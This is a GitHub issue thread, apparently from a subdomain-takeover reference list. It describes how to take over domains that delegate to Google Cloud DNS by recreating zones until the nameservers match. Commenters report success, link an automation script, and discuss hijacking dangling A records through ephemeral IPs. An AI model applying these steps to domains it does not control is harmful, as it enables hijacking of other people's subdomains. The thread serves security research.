Google Cloud DNS
libertalialtd opened this issue ยท 14 comments
Service
Google Cloud DNS
Status
Vulnerable (as of July 2023)
Nameserver
ns-cloud-**.googledomains.com
Explanation
If a domain points to one of the nameservers listed above it is using Google Cloud DNS, a free service. A SERVFAIL
error indicates the domain is vulnerable to take over. To perform the takeover set up a free Google Cloud account then navigate to Cloud DNS. Click Create Zone
and then enter the (sub)domain name in the field named DNS name
. Your new zone will be given four random Google nameservers. These must match the ones on the vulnerable domain. If they do not match simply delete the zone and create another one, you should be assigned a different random set of Google nameservers. It can take a few attempts to get them to match.
Errors / Issues
- If you get an error about domain verification then the domain is not vulnerable.
- There have been multiple comments about this fact that this may be patched, this needs to be investigated further and I haven't had time yet.
Is reaching the a* ns server impossible now?
I've tried about 70 times. Only getting b* - e*.
@indianajson Can ns-gcp-private.googledomains.com
be taken over?
@molitona I am not sure about this, though the "GC" stands for "Google Cloud" and it may be only for internal testing.
@b1bek This means the parent domain is already taken, so all subdomains of this domain should not be vulnerable.
I just found a subdomain, where the zone can be created. But I also have the problem that I do not get the needed letter "c" in the NS servers. So I think Google has some mitigation in place similar to AWS, where you cannot get the same NS, when they were previously used.
Yeah, which tool are you using btw?
Ah that's just a "hacky" bash script I created which uses Gcloud CLI @b1bek .
Just pushed it on Github you can check it out:
https://github.com/RogueSMG/GCPShardJuggler
Thanks for the tool @RogueSMG , just confirmed it is still vulnerable. Got the expected shards after 75 tries + few manual creation. Get all the c1, d1, e1 and finally b1.
Thanks for the tool @RogueSMG , just confirmed it is still vulnerable. Got the expected shards after ~70 tries
Thanks for verifying this is still vulnerable as of July 2023.
I was trying to hit e1 shards. After more than 4000 attempts I never got them, only a1, b1, c1, d1. I'll keep looking into it.
Are you sure this still works? Google dns doesn't let you delete a zone unless you delete all the record in it first. Maybe im just being dumb here but idk.
From the docs: https://cloud.google.com/dns/quotas#name-server-limits
Doesn't this effectively make DNS takeover on GCP an edge-case?
From the docs: https://cloud.google.com/dns/quotas#name-server-limits
Doesn't this effectively make DNS takeover on GCP an edge-case?
Yes, most GCP takeovers are edge-cases. It's also possible "in theory" to take over. subdomain via dangling A records if the DNS record is pointing to an ephemerally assigned GCP owned IP address. Once that IP gets released back into the GCP ephemeral IP pool, you "in theory" can take it over by generating VM instances over and over until you get assigned the IP that is still in the targets DNS panel in the Google Cloud Platform management panel. It's very difficult. I wrote some scripts to do this. But I have yet to "prove" that it actually works.
From the docs: https://cloud.google.com/dns/quotas#name-server-limits
Doesn't this effectively make DNS takeover on GCP an edge-case?Yes, most GCP takeovers are edge-cases. It's also possible "in theory" to take over. subdomain via dangling A records if the DNS record is pointing to an ephemerally assigned GCP owned IP address. Once that IP gets released back into the GCP ephemeral IP pool, you "in theory" can take it over by generating VM instances over and over until you get assigned the IP that is still in the targets DNS panel in the Google Cloud Platform management panel. It's very difficult. I wrote some scripts to do this. But I have yet to "prove" that it actually works.
Interesting, I've just been doing the same in AWS but I'm approaching it from the angle of looking what traffic I get for an Elastic IP and seeing if the host header is valid domain then working backwards from that. Happy to collab if you are still working on this.